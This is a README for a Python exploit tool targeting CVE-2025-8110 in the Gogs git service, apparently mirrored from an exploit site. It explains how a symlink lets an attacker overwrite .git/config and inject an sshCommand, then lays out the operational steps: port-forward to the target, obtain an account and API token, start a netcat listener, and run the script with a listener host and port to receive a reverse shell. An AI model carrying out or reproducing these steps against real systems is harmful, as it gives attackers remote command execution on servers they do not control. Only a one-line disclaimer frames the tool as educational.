Share
## https://sploitus.com/exploit?id=CF9783E2-A42B-522B-AE99-DB74B8CBE93B
# Gogs CVE-2025-8110 RCE Exploit

An automated Python exploit for **CVE-2025-8110** in Gogs. This vulnerability allows for Remote Code Execution (RCE) by abusing the `PutContents` API, which fails to validate if a file path is a symlink. By overwriting the internal `.git/config` file via a symlink, we can inject a malicious `sshCommand` to trigger a reverse shell.

## ๐Ÿ› ๏ธ Prerequisites

Ensure you have Python 3 and the necessary dependencies installed:

```bash
pip install requests rich beautifulsoup4
```

You must also have **git** installed and reachable in your `$PATH` for the repository cloning and committing phase.

## โš™๏ธ Setup & Configuration

### 1. Accessing the Gogs WebUI
Gogs may be bound to `127.0.0.1:3001`. Use port forwarding to access the WebUI locally:

```bash
ssh -L 3001:127.0.0.1:3001 user@target-ip
```

### 2. Account Creation
Once forwarded, navigate to `http://localhost:3001`:
* Create a new account.
* Note down your **Username** and **Password** for the script.

### 3. Generating the API Token
The script uses the Gogs API to deliver the payload:
1.  Log in to the WebUI.
2.  Navigate to **Settings** -> **Applications**.
3.  Under **Manage Personal Access Tokens**, generate a new token.
4.  Copy the token immediately.

---

## ๐Ÿš€ Execution

### 1. Start a Netcat Listener
Start your listener before running the script, as the shell triggers as soon as the API update is processed.

```bash
nc -lvnp 5555
```

### 2. Run the Exploit
Pass your credentials and the token as arguments:

```bash
python3 exploit.py -u http://localhost:3001 -un  -pw  -t  -lh  -lp 5555
```

### Arguments
| Flag | Description |
| :--- | :--- |
| `-u` | The base URL of the Gogs instance (e.g., `http://localhost:3001`). |
| `-un` | The username of the account you created. |
| `-pw` | The password of the account you created. |
| `-t` | The API token generated in Settings. |
| `-lh` | Your listener's IP address (LHOST). |
| `-lp` | Your listener's port (LPORT). |

> **Note:** If the script hangs or returns a `Read timed out` after "Overwriting .git/config", check your listener. This usually indicates the reverse shell has connected successfully and is holding the connection.

---

**Author:** [TYehan](https://github.com/TYehan)

**Disclaimer:** This tool is for educational purposes and authorized security auditing only. Use responsibly.